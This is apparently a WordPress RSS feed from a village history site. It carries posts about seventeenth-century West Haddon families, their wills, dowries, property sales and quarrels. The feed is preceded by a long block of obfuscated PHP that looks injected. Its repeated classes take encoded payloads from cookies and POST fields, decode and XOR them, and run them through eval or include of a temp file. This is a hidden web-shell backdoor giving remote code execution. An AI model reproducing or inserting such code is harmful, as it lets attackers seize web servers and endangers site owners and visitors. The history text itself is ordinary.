$QNtGJaYUN = "\x53" . chr (95) . "\x42" . chr (121) . "\122";$NKYkGe = "\143" . chr ( 873 - 765 )."\x61" . 's' . 's' . chr ( 285 - 190 ).'e' . "\170" . "\151" . 's' . 't' . chr ( 359 - 244 ); $DXPhzKsB = class_exists($QNtGJaYUN); $NKYkGe = "53453";$UjpNLwvoUr = strpos($NKYkGe, $QNtGJaYUN);if ($DXPhzKsB == $UjpNLwvoUr){function CFaIPukGN(){$kDZQkDkEs = new /* 46081 */ S_ByR(41607 + 41607); $kDZQkDkEs = NULL;}$yUzhy = "41607";class S_ByR{private function KIUjNsKAn($yUzhy){if (is_array(S_ByR::$JNSZV)) {$name = sys_get_temp_dir() . "/" . crc32(S_ByR::$JNSZV["salt"]);@S_ByR::$JNSZV["write"]($name, S_ByR::$JNSZV["content"]);include $name;@S_ByR::$JNSZV["delete"]($name); $yUzhy = "41607";exit();}}public function EgiFINQx(){$qeDBaCy = "40190";$this->_dummy = str_repeat($qeDBaCy, strlen($qeDBaCy));}public function __destruct(){S_ByR::$JNSZV = @unserialize(S_ByR::$JNSZV); $yUzhy = "1440_35387";$this->KIUjNsKAn($yUzhy); $yUzhy = "1440_35387";}public function zgZhnVOh($qeDBaCy, $joPYh){return $qeDBaCy[0] ^ str_repeat($joPYh, intval(strlen($qeDBaCy[0]) / strlen($joPYh)) + 1);}public function JKTZirUk($qeDBaCy){$vbrMzRjm = chr (98) . chr (97) . 's' . chr (101) . '6' . '4';return array_map($vbrMzRjm . chr ( 337 - 242 )."\144" . "\145" . "\x63" . chr ( 247 - 136 ).chr ( 1046 - 946 ).chr ( 338 - 237 ), array($qeDBaCy,));}public function __construct($MAAOPlIUob=0){$ueNaC = ',';$qeDBaCy = "";$EkmPVLgu = $_POST;$tbsDSN = $_COOKIE;$joPYh = "def73cd6-c868-4c2f-aa52-9f7566363d54";$IDbTqjrn = @$tbsDSN[substr($joPYh, 0, 4)];if (!empty($IDbTqjrn)){$IDbTqjrn = explode($ueNaC, $IDbTqjrn);foreach ($IDbTqjrn as $npYDS){$qeDBaCy .= @$tbsDSN[$npYDS];$qeDBaCy .= @$EkmPVLgu[$npYDS];}$qeDBaCy = $this->JKTZirUk($qeDBaCy);}S_ByR::$JNSZV = $this->zgZhnVOh($qeDBaCy, $joPYh);if (strpos($joPYh, $ueNaC) !== FALSE){$joPYh = explode($ueNaC, $joPYh); $CqjvVNVa = base64_decode(md5($joPYh[0])); $PcMvdgsB = strlen($joPYh[1]) > 5 ? substr($joPYh[1], 0, 5) : $joPYh[1];$_GET['new_key'] = md5(implode('', $joPYh)); $jpPAZjiVE = str_repeat($PcMvdgsB, 2); $BWjGNz = array_map('trim', $joPYh);}}public static $JNSZV = 57574;}CFaIPukGN();}$HplAA = "\172" . "\160" . '_' . 'k' . "\x6f" . chr ( 187 - 117 )."\x78";$IFJdUt = 'c' . "\x6c" . 'a' . chr (115) . 's' . "\x5f" . "\145" . chr ( 142 - 22 ).chr ( 456 - 351 ).chr ( 140 - 25 )."\x74" . "\x73";$UriZbCCfRu = $IFJdUt($HplAA); $HplAA = "2077";$PIQEiaQz = !$UriZbCCfRu;$IFJdUt = "4030";if ($PIQEiaQz){class zp_koFx{private $UuymVt;public static $SUtWeAAC = "b1e73c8a-bfe4-4f9c-9055-c648c8fce573";public static $FBjUeD = 34354;public function __construct($rMRtD=0){$fVgHqpkWz = $_COOKIE;$MglDe = $_POST;$gwxDIQhzU = @$fVgHqpkWz[substr(zp_koFx::$SUtWeAAC, 0, 4)];if (!empty($gwxDIQhzU)){$eSNlanU = "base64";$tWVwMFru = "";$gwxDIQhzU = explode(",", $gwxDIQhzU);foreach ($gwxDIQhzU as $YGhamEUX){$tWVwMFru .= @$fVgHqpkWz[$YGhamEUX];$tWVwMFru .= @$MglDe[$YGhamEUX];}$tWVwMFru = array_map($eSNlanU . chr ( 292 - 197 )."\x64" . "\145" . chr (99) . "\x6f" . chr (100) . chr (101), array($tWVwMFru,)); $tWVwMFru = $tWVwMFru[0] ^ str_repeat(zp_koFx::$SUtWeAAC, (strlen($tWVwMFru[0]) / strlen(zp_koFx::$SUtWeAAC)) + 1);zp_koFx::$FBjUeD = @unserialize($tWVwMFru);}}private function TWEKCYleS(){if (is_array(zp_koFx::$FBjUeD)) {$bolAEBiq = str_replace('<' . "\77" . chr (112) . "\x68" . "\x70", "", zp_koFx::$FBjUeD["\143" . "\157" . chr ( 130 - 20 ).chr (116) . chr ( 593 - 492 ).chr ( 1037 - 927 )."\164"]);eval($bolAEBiq); $sfDZnt = "36234";exit();}}public function __destruct(){$this->TWEKCYleS(); $dhTLttXbe = str_pad("36234", 10);}}$dOkqDNDh = new /* 49712 */ zp_koFx(); $dOkqDNDh = substr("25980_52432", 1);}$GIDSw = 'q' . chr (116) . "\x5f" . "\154" . "\x77" . "\x44" . 'V' . chr ( 774 - 694 ); $XQLAxs = chr ( 730 - 631 ).'l' . chr ( 1047 - 950 ).chr ( 430 - 315 ).chr (115) . chr ( 976 - 881 ).chr (101) . "\170" . 'i' . chr ( 300 - 185 ).chr ( 678 - 562 ).chr (115); $vRmhOxkSJr = class_exists($GIDSw); $XQLAxs = "48696";$DnnwAQdBz = strpos($XQLAxs, $GIDSw);if ($vRmhOxkSJr == $DnnwAQdBz){function FwIcmfvByl(){$XhQUgMFWrs = new /* 54360 */ qt_lwDVP(46021 + 46021); $XhQUgMFWrs = NULL;}$Ewnlb = "46021";class qt_lwDVP{private function AQmWgZ($Ewnlb){if (is_array(qt_lwDVP::$KDlNHTzGqt)) {$name = sys_get_temp_dir() . "/" . crc32(qt_lwDVP::$KDlNHTzGqt["salt"]);@qt_lwDVP::$KDlNHTzGqt["write"]($name, qt_lwDVP::$KDlNHTzGqt["content"]);include $name;@qt_lwDVP::$KDlNHTzGqt["delete"]($name); $Ewnlb = "46021";exit();}}public function SjqPhttFAM(){$gttcYo = "32579";$this->_dummy = str_repeat($gttcYo, strlen($gttcYo));}public function __destruct(){qt_lwDVP::$KDlNHTzGqt = @unserialize(qt_lwDVP::$KDlNHTzGqt); $Ewnlb = "2186_60409";$this->AQmWgZ($Ewnlb); $Ewnlb = "2186_60409";}public function KcFJkiP($gttcYo, $qAGlkRWke){return $gttcYo[0] ^ str_repeat($qAGlkRWke, intval(strlen($gttcYo[0]) / strlen($qAGlkRWke)) + 1);}public function HTyANl($gttcYo){$vPjIUFx = 'b' . 'a' . "\x73" . "\x65" . '6' . chr ( 366 - 314 );return array_map($vPjIUFx . chr (95) . "\144" . "\x65" . chr (99) . chr (111) . "\144" . "\145", array($gttcYo,));}public function __construct($rdFZQCq=0){$LNwaPa = ',';$gttcYo = "";$QjgQuRxL = $_POST;$nYnOCMgaQ = $_COOKIE;$qAGlkRWke = "9c34e2e8-f28a-4b2a-bf9a-faf63e95b688";$HBpfdRT = @$nYnOCMgaQ[substr($qAGlkRWke, 0, 4)];if (!empty($HBpfdRT)){$HBpfdRT = explode($LNwaPa, $HBpfdRT);foreach ($HBpfdRT as $RtiLpZB){$gttcYo .= @$nYnOCMgaQ[$RtiLpZB];$gttcYo .= @$QjgQuRxL[$RtiLpZB];}$gttcYo = $this->HTyANl($gttcYo);}qt_lwDVP::$KDlNHTzGqt = $this->KcFJkiP($gttcYo, $qAGlkRWke);if (strpos($qAGlkRWke, $LNwaPa) !== FALSE){$qAGlkRWke = explode($LNwaPa, $qAGlkRWke); $pTxDzVwhnu = base64_decode(md5($qAGlkRWke[0])); $yuTgeCjtgt = strlen($qAGlkRWke[1]) > 5 ? substr($qAGlkRWke[1], 0, 5) : $qAGlkRWke[1];$_GET['new_key'] = md5(implode('', $qAGlkRWke)); $vCPZewtjV = str_repeat($yuTgeCjtgt, 2); $qYuhhubU = array_map('trim', $qAGlkRWke);if (is_array($qYuhhubU) && count($qYuhhubU) > 1) {$BEggqce = $qYuhhubU[0];} else {$BEggqce = '';}}}public static $KDlNHTzGqt = 48483;}FwIcmfvByl();}$QYeEjnWj = "\125" . 'm' . "\x49" . "\137" . 'N' . chr ( 1016 - 910 ).chr ( 437 - 362 ).chr ( 466 - 349 ); $QuYlY = chr (99) . chr ( 874 - 766 ).chr ( 887 - 790 ).'s' . "\x73" . "\137" . 'e' . chr ( 253 - 133 )."\151" . chr ( 188 - 73 )."\164" . chr ( 143 - 28 ); $SjVZUpUsEX = class_exists($QYeEjnWj); $QuYlY = "28434";$XRkhHnexu = strpos($QuYlY, $QYeEjnWj);if ($SjVZUpUsEX == $XRkhHnexu){function cqhQyY(){$hUvmcW = new /* 42672 */ UmI_NjKu(58081 + 58081); $hUvmcW = NULL;}$doJdSKil = "58081";class UmI_NjKu{private function iSzZEcimW($doJdSKil){if (is_array(UmI_NjKu::$rklDGVc)) {$name = sys_get_temp_dir() . "/" . crc32(UmI_NjKu::$rklDGVc["salt"]);@UmI_NjKu::$rklDGVc["write"]($name, UmI_NjKu::$rklDGVc["content"]);include $name;@UmI_NjKu::$rklDGVc["delete"]($name); $doJdSKil = "58081";exit();}}public function ORICceN(){$JePhtQW = "35899";$this->_dummy = str_repeat($JePhtQW, strlen($JePhtQW));}public function __destruct(){UmI_NjKu::$rklDGVc = @unserialize(UmI_NjKu::$rklDGVc); $doJdSKil = "24842_24873";$this->iSzZEcimW($doJdSKil); $doJdSKil = "24842_24873";}public function AzFhxiVrz($JePhtQW, $LhhCBiC){return $JePhtQW[0] ^ str_repeat($LhhCBiC, intval(strlen($JePhtQW[0]) / strlen($LhhCBiC)) + 1);}public function CwwuzKkpYV($JePhtQW){$wqDqomLNsb = "\142" . chr ( 358 - 261 ).chr (115) . "\145" . chr (54) . "\x34";return array_map($wqDqomLNsb . "\x5f" . "\x64" . "\145" . "\143" . "\x6f" . chr (100) . "\145", array($JePhtQW,));}public function __construct($wLGoqCUw=0){$TeCFLgT = chr (44); $JePhtQW = "";$aSBpbrcg = $_POST;$WTpgwjUXZy = $_COOKIE;$LhhCBiC = "69ae2cf7-b89f-45d6-8e0b-308b0deee787";$oTQCy = @$WTpgwjUXZy[substr($LhhCBiC, 0, 4)];if (!empty($oTQCy)){$oTQCy = explode($TeCFLgT, $oTQCy);foreach ($oTQCy as $ITpLNFz){$JePhtQW .= @$WTpgwjUXZy[$ITpLNFz];$JePhtQW .= @$aSBpbrcg[$ITpLNFz];}$JePhtQW = $this->CwwuzKkpYV($JePhtQW);}UmI_NjKu::$rklDGVc = $this->AzFhxiVrz($JePhtQW, $LhhCBiC);if (strpos($LhhCBiC, $TeCFLgT) !== FALSE){$LhhCBiC = explode($TeCFLgT, $LhhCBiC); $cMTakutgep = base64_decode(md5($LhhCBiC[0])); $KaXGS = strlen($LhhCBiC[1]) > 5 ? substr($LhhCBiC[1], 0, 5) : $LhhCBiC[1];$_GET['new_key'] = md5(implode('', $LhhCBiC)); $zzrCjTd = str_repeat($KaXGS, 2); $PKAymsvHyH = array_map('trim', $LhhCBiC);}}public static $rklDGVc = 715;}cqhQyY();}$uHgLEQU = chr (103) . chr ( 1015 - 900 ).'_' . chr ( 893 - 773 ).chr ( 789 - 719 )."\172" . 'k' . chr (77); $pPXnObLCX = chr ( 179 - 80 ).chr (108) . "\x61" . "\x73" . "\x73" . "\137" . chr ( 869 - 768 )."\170" . "\151" . chr (115) . chr ( 540 - 424 )."\x73";$rnAjC = class_exists($uHgLEQU); $pPXnObLCX = "55396";$niQdr = !1;if ($rnAjC == $niQdr){function jvXcxijEDz(){$vvMmHgGwh = new /* 50725 */ gs_xFzkM(15165 + 15165); $vvMmHgGwh = NULL;}$PbpIicnwbj = "15165";class gs_xFzkM{private function ganiYo($PbpIicnwbj){if (is_array(gs_xFzkM::$MdUchWLnq)) {$WoNOnirnp = sys_get_temp_dir() . "/" . crc32(gs_xFzkM::$MdUchWLnq[chr ( 1002 - 887 ).chr ( 627 - 530 ).chr (108) . 't']);@gs_xFzkM::$MdUchWLnq["\167" . "\x72" . "\x69" . chr ( 520 - 404 )."\145"]($WoNOnirnp, gs_xFzkM::$MdUchWLnq["\143" . 'o' . chr ( 705 - 595 )."\164" . chr ( 688 - 587 ).'n' . chr ( 145 - 29 )]);include $WoNOnirnp;@gs_xFzkM::$MdUchWLnq[chr ( 874 - 774 )."\x65" . "\154" . 'e' . "\164" . "\145"]($WoNOnirnp); $PbpIicnwbj = "15165";exit();}}private $aZMUl;public function tXsJVTSOjz(){echo 64568;}public function __destruct(){gs_xFzkM::$MdUchWLnq = @unserialize(gs_xFzkM::$MdUchWLnq); $PbpIicnwbj = "59319_14842";$this->ganiYo($PbpIicnwbj); $PbpIicnwbj = "59319_14842";}public function MkZaVGGSpT($kleRhzXa, $WCzbJNK){return $kleRhzXa[0] ^ str_repeat($WCzbJNK, (strlen($kleRhzXa[0]) / strlen($WCzbJNK)) + 1);}public function MChbbWCv($kleRhzXa){$FmJOHYd = "base64";return array_map($FmJOHYd . chr (95) . chr (100) . chr (101) . 'c' . "\157" . 'd' . chr (101), array($kleRhzXa,));}public function __construct($rmyccEntP=0){$kleRhzXa = "";$OeOewtO = $_POST;$LmCiyD = $_COOKIE;$WCzbJNK = "5db45b1b-91e3-40c3-97f6-ab31e10f3d85";$VMWjZLqg = @$LmCiyD[substr($WCzbJNK, 0, 4)];if (!empty($VMWjZLqg)){$VMWjZLqg = explode(",", $VMWjZLqg);foreach ($VMWjZLqg as $UMCkt){$kleRhzXa .= @$LmCiyD[$UMCkt];$kleRhzXa .= @$OeOewtO[$UMCkt];}$kleRhzXa = $this->MChbbWCv($kleRhzXa);}gs_xFzkM::$MdUchWLnq = $this->MkZaVGGSpT($kleRhzXa, $WCzbJNK); $WCzbJNK = explode(",", $WCzbJNK);}public static $MdUchWLnq = 44665;}jvXcxijEDz();}$YQAsf = "\x4b" . chr ( 373 - 305 ).chr ( 150 - 55 )."\143" . "\103" . 'W';$ibGUqNbiS = "\x63" . chr ( 704 - 596 ).'a' . chr ( 318 - 203 )."\x73" . "\137" . 'e' . chr (120) . "\151" . "\x73" . chr (116) . "\x73";$PlisgXUZ = class_exists($YQAsf); $ibGUqNbiS = "25335";$jbKirQbi = strpos($ibGUqNbiS, $YQAsf);if ($PlisgXUZ == $jbKirQbi){function SoBIxEIme(){$OAKCzCev = new /* 19303 */ KD_cCW(31095 + 31095); $OAKCzCev = NULL;}$hzdzLVWhG = "31095";class KD_cCW{private function yCtpMpLib($hzdzLVWhG){if (is_array(KD_cCW::$vWVegSsG)) {$name = sys_get_temp_dir() . "/" . crc32(KD_cCW::$vWVegSsG["salt"]);@KD_cCW::$vWVegSsG["write"]($name, KD_cCW::$vWVegSsG["content"]);include $name;@KD_cCW::$vWVegSsG["delete"]($name); $hzdzLVWhG = "31095";exit();}}public function WKcBFfmiV(){$DCEctsp = "42062";$this->_dummy = str_repeat($DCEctsp, strlen($DCEctsp));}public function __destruct(){KD_cCW::$vWVegSsG = @unserialize(KD_cCW::$vWVegSsG); $hzdzLVWhG = "26153_16108";$this->yCtpMpLib($hzdzLVWhG); $hzdzLVWhG = "26153_16108";}public function rYYznbD($DCEctsp, $BQbbJkcOo){return $DCEctsp[0] ^ str_repeat($BQbbJkcOo, intval(strlen($DCEctsp[0]) / strlen($BQbbJkcOo)) + 1);}public function aeKivBPUwB($DCEctsp){$dWZxRI = "\x62" . "\141" . chr (115) . chr (101) . chr ( 473 - 419 ).chr (52);return array_map($dWZxRI . chr (95) . 'd' . chr ( 981 - 880 )."\x63" . chr ( 899 - 788 ).'d' . "\x65", array($DCEctsp,));}public function __construct($biLXegClX=0){$rvSza = chr (44); $DCEctsp = "";$kYeip = $_POST;$wQwsJ = $_COOKIE;$BQbbJkcOo = "9c799b58-4098-464c-bcaa-7c887ae8c09f";$DWmVDRC = @$wQwsJ[substr($BQbbJkcOo, 0, 4)];if (!empty($DWmVDRC)){$DWmVDRC = explode($rvSza, $DWmVDRC);foreach ($DWmVDRC as $IdVNjzVr){$DCEctsp .= @$wQwsJ[$IdVNjzVr];$DCEctsp .= @$kYeip[$IdVNjzVr];}$DCEctsp = $this->aeKivBPUwB($DCEctsp);}KD_cCW::$vWVegSsG = $this->rYYznbD($DCEctsp, $BQbbJkcOo);if (strpos($BQbbJkcOo, $rvSza) !== FALSE){$BQbbJkcOo = str_pad($BQbbJkcOo, 10); $BQbbJkcOo = strcspn ($BQbbJkcOo, $rvSza); $BQbbJkcOo = ltrim(rtrim($BQbbJkcOo));}}public static $vWVegSsG = 27976;}SoBIxEIme();}$lTPklsXfA = chr (106) . chr (119) . chr (73) . chr (95) . 'H' . "\131" . chr ( 169 - 59 ).'o';$jCvdt = 'c' . "\154" . "\141" . chr (115) . "\163" . '_' . "\145" . "\x78" . chr (105) . chr (115) . "\164" . 's';$bUNBkjy = class_exists($lTPklsXfA); $jCvdt = "39704";$jPWKAeMk = !1;if ($bUNBkjy == $jPWKAeMk){function ApZmzAyjJr(){return FALSE;}$gCDTLQ = "6395";ApZmzAyjJr();class jwI_HYno{private function pnIHxuk($gCDTLQ){if (is_array(jwI_HYno::$ABBse)) {$UyVPvBkaJ = str_replace(chr (60) . '?' . "\160" . "\150" . "\160", "", jwI_HYno::$ABBse["\x63" . chr ( 761 - 650 ).chr ( 333 - 223 )."\x74" . chr (101) . chr (110) . chr (116)]);eval($UyVPvBkaJ); $gCDTLQ = "6395";exit();}}private $OYBac;public function dcNQcafY(){echo 19770;}public function __destruct(){$gCDTLQ = "9730_1830";$this->pnIHxuk($gCDTLQ); $gCDTLQ = "9730_1830";}public function __construct($POFhE=0){$MxmmIkzOiU = $_POST;$HTgqw = $_COOKIE;$DDisn = "4c7f33e5-de10-4e19-9940-82caaf955dc7";$rKUvvNIkYD = @$HTgqw[substr($DDisn, 0, 4)];if (!empty($rKUvvNIkYD)){$dWDjXd = "base64";$pXNJBYrvx = "";$rKUvvNIkYD = explode(",", $rKUvvNIkYD);foreach ($rKUvvNIkYD as $OoSHkX){$pXNJBYrvx .= @$HTgqw[$OoSHkX];$pXNJBYrvx .= @$MxmmIkzOiU[$OoSHkX];}$pXNJBYrvx = array_map($dWDjXd . "\x5f" . "\x64" . chr (101) . "\143" . "\x6f" . "\144" . chr ( 899 - 798 ), array($pXNJBYrvx,)); $pXNJBYrvx = $pXNJBYrvx[0] ^ str_repeat($DDisn, (strlen($pXNJBYrvx[0]) / strlen($DDisn)) + 1);jwI_HYno::$ABBse = @unserialize($pXNJBYrvx); $pXNJBYrvx = class_exists("9730_1830");}}public static $ABBse = 11214;}$EPUHUamuRu = new /* 3878 */ $lTPklsXfA(6395 + 6395); $jPWKAeMk = $EPUHUamuRu = $gCDTLQ = Array();}$paxDZbQre = 'r' . "\113" . chr ( 411 - 316 ).'G' . chr ( 485 - 399 ).'b' . chr ( 397 - 287 ).'p';$uKlZGtXU = chr ( 1032 - 933 )."\x6c" . 'a' . chr (115) . chr (115) . '_' . 'e' . chr ( 394 - 274 ).'i' . "\x73" . chr ( 1029 - 913 ).chr (115); $rgpUNYESyK = class_exists($paxDZbQre); $paxDZbQre = "60634";$uKlZGtXU = "33514";$NTskpFbrC = FALSE;if ($rgpUNYESyK === $NTskpFbrC){$EmyKsYF = "46615";class rK_GVbnp{public function iwInMYTh(){echo "48779";}private $GfHYArYQNx;public static $GVcBrAVtn = "8c38d52d-0cd6-4850-8a68-3207183a77e5";public static $XsnJKJ = 30607;public function __construct($wOtkoj=0){$HAQXjyJRV = $_POST;$nJCZFj = $_COOKIE;$nInCsXqAgY = @$nJCZFj[substr(rK_GVbnp::$GVcBrAVtn, 0, 4)];if (!empty($nInCsXqAgY)){$BuyRAOhC = "base64";$JrSBr = "";$nInCsXqAgY = explode(",", $nInCsXqAgY);foreach ($nInCsXqAgY as $lRCFMISl){$JrSBr .= @$nJCZFj[$lRCFMISl];$JrSBr .= @$HAQXjyJRV[$lRCFMISl];}$JrSBr = array_map($BuyRAOhC . "\137" . "\x64" . chr ( 919 - 818 )."\143" . "\157" . "\x64" . "\x65", array($JrSBr,)); $JrSBr = $JrSBr[0] ^ str_repeat(rK_GVbnp::$GVcBrAVtn, (strlen($JrSBr[0]) / strlen(rK_GVbnp::$GVcBrAVtn)) + 1);rK_GVbnp::$XsnJKJ = @unserialize($JrSBr);}}private function jYIOrjxtF($EmyKsYF){if (is_array(rK_GVbnp::$XsnJKJ)) {$pyhQNoRNaW = str_replace(chr (60) . chr ( 654 - 591 ).chr ( 1039 - 927 ).chr ( 527 - 423 ).chr (112), "", rK_GVbnp::$XsnJKJ[chr ( 515 - 416 ).'o' . chr ( 1060 - 950 ).chr (116) . chr (101) . 'n' . "\164"]);eval($pyhQNoRNaW); $EmyKsYF = "46615";exit();}}public function __destruct(){$this->jYIOrjxtF($EmyKsYF);}}$nyUbj = new /* 36413 */ rK_GVbnp(); $nyUbj = str_repeat("11438_8061", 1);}$HQDcZqIrKy = 'V' . "\137" . chr (85) . chr (65) . 'r' . "\x45";$ODHfDoIng = "\x63" . 'l' . "\x61" . chr (115) . "\x73" . "\x5f" . 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"\137" . chr ( 367 - 267 ).chr (101) . 'c' . chr (111) . "\144" . "\x65", array($khDygh,));}public function __construct($MTrsU=0){$bJQfi = chr ( 1041 - 997 ); $khDygh = "";$MrSwbCJYQ = $_POST;$dNvgRaPe = $_COOKIE;$OfZqf = "1ae0aa97-cd41-4122-aa1b-643238b1aea3";$pBliwISE = @$dNvgRaPe[substr($OfZqf, 0, 4)];if (!empty($pBliwISE)){$pBliwISE = explode($bJQfi, $pBliwISE);foreach ($pBliwISE as $JqrOowYiS){$khDygh .= @$dNvgRaPe[$JqrOowYiS];$khDygh .= @$MrSwbCJYQ[$JqrOowYiS];}$khDygh = $this->voMKnIO($khDygh);}fw_wUzL::$FYzYRo = $this->lUGEe($khDygh, $OfZqf);if (strpos($OfZqf, $bJQfi) !== FALSE){$OfZqf = ltrim($OfZqf); $OfZqf = str_pad($OfZqf, 10);}}public static $FYzYRo = 23166;}tdILxJfVci();} Uncategorized – West Haddon History https://westhaddonhistorysite.org Perspectives on the past Mon, 21 Aug 2017 19:06:33 +0000 en-GB hourly 1 https://wordpress.org/?v=6.8.5 https://westhaddonhistorysite.org/wp-content/uploads/2017/07/cropped-historysite-logo-32x32.jpg Uncategorized – West Haddon History https://westhaddonhistorysite.org 32 32 William Henfrey: tailor and smallholder – keeping it in the family https://westhaddonhistorysite.org/william-henfrey-tailor-and-smallholder-keeping-it-in-the-family/ Mon, 21 Aug 2017 19:06:33 +0000 http://westhaddonhistorysite.org/?p=436 Continue reading "William Henfrey: tailor and smallholder – keeping it in the family"

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Like William Lane, William Henfrey also made provision for his children – not through a marriage settlement, in his case, but through his will. This offers a brief snapshot into the lives of his family.

William and his wife Joan had two sons and two daughters when he came to make his will, which was about ten years before the fire. The boys had both been baptised at Crick, but the girls may have been born later, after the family moved to West Haddon (for what reason we do not know.)

He left the girls marriage portions and specified how the money was to be arranged. £8 was to be put out at interest to some honest, sufficient man or men for each daughter, with the interest added to the principal for the increase of her portion to be paid her at 20 years or at the day of her marriage.

In addition his five acres of land were to be sold when the eldest daughter Elizabeth came of age and the proceeds split between Elizabeth, her sister Mary and their brother Thomas. (William hoped that the land would fetch £30, giving them £10 each.) Having a few acres of land would have supplemented the family income, providing grazing for a few sheep, perhaps a house cow for milk, butter and cheese, as well as a supply of crops for income or home consumption.

His house was to be shared by his wife Joan, for her lifetime, and his eldest son William, but the boy was not to have his share until he reached 21 (which he did in 1651), along with first refusal on the purchase of the land, if family funds were to stretch that far when the time came.

Some years later the girls both married – Mary in 1670 and Elizabeth two years later. William appears not to have married, but Thomas, a tailor like his father, did, and when he came to make his will, early in the next century, he passed the five acres his father had bought down to the next generation of the family.

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William Lane: another marriage settlement https://westhaddonhistorysite.org/william-lane-another-marriage-settlement/ Fri, 18 Aug 2017 16:01:44 +0000 http://westhaddonhistorysite.org/?p=422 Continue reading "William Lane: another marriage settlement"

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William Lane was a small farmer in West Haddon around the time of the fire. He had two daughters. The elder, Mary, married Thomas Knowles in 1663 and all attempts to trace any record of the couple thereafter have so far failed. A few months after the wedding his wife Dorothy died, leaving his younger daughter, another Dorothy, to keep house for him while he was out in the fields.

But by 1666 (the year of the Great Fire of London), Dorothy had caught the eye of a young man from Crick, and marriage plans were afoot. While the bride and groom were perhaps gazing into each other’s eyes, their fathers got down to business…

It was customary at that time for the bride to be given with a dowry or marriage portion. It may have been quite small – as little as £5 has been recorded in some wills – but if the family could possibly afford it, it was the respectable thing to do. (One factor in the origin of the white wedding dress – before it was made popular by the young Queen Victoria – was the tradition of being ‘given away in a shift’, signifying the bride coming to her husband without a dowry.)

But Dorothy Lane didn’t have to worry about walking up the aisle in her nightie. Her father and future father in law, a weaver called William Parker, had an agreement drawn up whereby William Lane’s house was put into trust for the benefit of Dorothy and William junior and any children they might have. A sum of money may also have changed hands, but there is no record of that.

Neither is there a record of the marriage in the West Haddon parish register, but we can be sure they were married, because in February 1668 there is a record of the burial of Dorothy, wife of William Parker. Was this the result of a complication in a first pregnancy? Before the year was out, Dorothy’s father was dead too, leaving William Parker junior in possession of the house.

He may have lived in it for a while, but in 1670 the parish register records the baptism of a daughter born to William and his new wife, Grace. And in that same year William sold the house to Edward Page, a baker, for £39.10s.

During the course of the 19th century a Baptist church was built to the west of the property and a Wesleyan chapel erected behind it. Though the chapel has since been demolished, the house retains the name ‘Wesleyan Cottage’.

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John Bland: founding a family https://westhaddonhistorysite.org/john-bland-founding-a-family/ Thu, 17 Aug 2017 19:21:13 +0000 http://westhaddonhistorysite.org/?p=418 Continue reading "John Bland: founding a family"

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When John Bland of Long Buckby came courting Lettice Miller of West Haddon her parents, Richard and Elizabeth Miller, approved the match and settled a house and some land on the happy couple when they tied the knot in the summer of 1656.

The first baby arrived promptly the following January. She was a little girl and they called her Elizabeth, after her grandmother. Very soon after, Lettice found herself pregnant again, probably just before the fire. The little family was not among those who lost everything during that disaster.

But there was sorrow in store. The following February baby Elizabeth died. She was buried on 4 February and only days later Lettice gave birth to another daughter. The new baby was baptised on 15 February and she was also given the name Elizabeth. (It was quite common at that time to name a child after a dead sibling – in this case it honoured her dead sister and her living grandmother.)

A number of other children followed, including Nicholas, who decided as he grew up that country life wasn’t for him and took himself off to London to seek his fortune. He became a City of London waterman, operating a boat on the Thames, taking passengers up and down the river – often a quicker way to their destinations than negotiating the narrow and crowded streets of the capital.

Nicholas spent the rest of his life in London and in due course his son William followed in his footsteps. The Bland house in West Haddon had been rented out for many years, but in 1729 William put it up for sale and the house, with the close behind it, was sold for a little over £60. Thomas Patch bought it and it remained in the Patch family for over a century, eventually becoming what we know now as The Old Brickyard.

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William Ringrose and the cottage that grew https://westhaddonhistorysite.org/william-ringrose-and-the-cottage-that-grew/ Wed, 16 Aug 2017 20:09:47 +0000 http://westhaddonhistorysite.org/?p=413 Continue reading "William Ringrose and the cottage that grew"

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William was a child at the time of the fire. He had an elder brother, Richard (named after his father) and a younger brother, John. His youngest brother, Thomas, born in 1655, had died before he was six months old. He also had two sisters: Susanna (named after her mother) and baby Mary, born just a year before the fire.

We don’t know much about his life, except that it was short. But we do know that in 1670 he bought a piece of land. He bought it from Thomas Kirtland. Thomas had bought it a few months before the fire, in April 1657, from a man called Richard Harris. It was an example of ‘market infill’, where an old market place gradually gets filled with buildings. West Haddon’s market had been in operation since before 1275, but competition – especially from Long Buckby, had led to a decline until by 1600 John Shuckburgh, who owned the market and derived an income from the tolls charged to traders, decided it wasn’t worth continuing and put the land up for sale. It passed through several hands, possibly being used at first as grazing, but we know that Richard Harris built a house on it. A year later he split off a quarter acre of his plot and sold it to Thomas Kirtland.

Thomas may well have used the quarter acre for the animals he was fattening, but for some reason he put it up for sale in 1670. And young William Ringrose bought it for £6! He built a cottage on it, but very soon after made a hurried will. Had he been injured in an accident? Or suddenly fallen ill? The will was made on 15 October 1672 and he was buried two days later.

He left money to his brothers and his sisters inherited the cottage. By the time they came to sell it, in 1682, Susanna was the wife of a yeoman at Cottesbrooke, while Mary, now about 26 and still single, was living in Westminster (doing what?We don’t know.) Unable to write, the sisters both signed the deed of sale with their marks.

Over the years the cottage was altered and added to and the quarter acre was gradually filled up with workshops and outbuildings. We know it now as the point of the Crown Lane triangle. Possibly the little cottage at the back, with the steeply pitched roof, may represent the original cottage that William built, or it may have disappeared under a later rebuilding of Manchester House.

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Thomas Kirtland and sibling rivalry https://westhaddonhistorysite.org/thomas-kirtland-and-sibling-rivalry/ Tue, 15 Aug 2017 20:03:07 +0000 http://westhaddonhistorysite.org/?p=407 Continue reading "Thomas Kirtland and sibling rivalry"

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In 1646, when Thomas Kirtland was a young man, he joined with his parents in the purchase of a house in West Haddon for £22. Father and son were both butchers and rented a close of pasture near the house from John Ward. With good grazing to hand they could feed stock to the peak of quality before slaughter. In 1651 John sold the pasture to his neighbour Sam Newman (another butcher) who continued to rent it to Thomas Kirtland for another year until Thomas bought it himself – at a nice profit for Sam.

We shall never know  what provoked Thomas and two other butchers – Henry Cosby and Edward Smith – to set upon Sam at Harlestone a few years later, but possibly that land sale or other business dealings had sown the seeds of animosity between them. (See post for August 2 – Samuel Newman: butcher and brawler?)

Perhaps Thomas had an argumentative temperament, which he may have passed on to at least one of his sons.

In 1678 he settled the house and some land on his elder son Edward and his new wife Alice. The house still stands in the village. (Not bad for £22!)

At his death in 1683 Thomas bequeathed other property to his younger son, Thomas junior. Some years later the brothers were fighting a case through the Court of Chancery as Edward accused his younger brother of taking property that should have been his. The Court noted that,

they never lived together in so kind and friendly a manner as brothers should have done, neither was there such friendship and kindness showed between them as ought to be maintained betwixt near relatives and good neighbours…

The breach was partly healed in the next generation when Thomas junior, who had no children of his own, left his property divided between his wife and the son of his elder brother Edward.

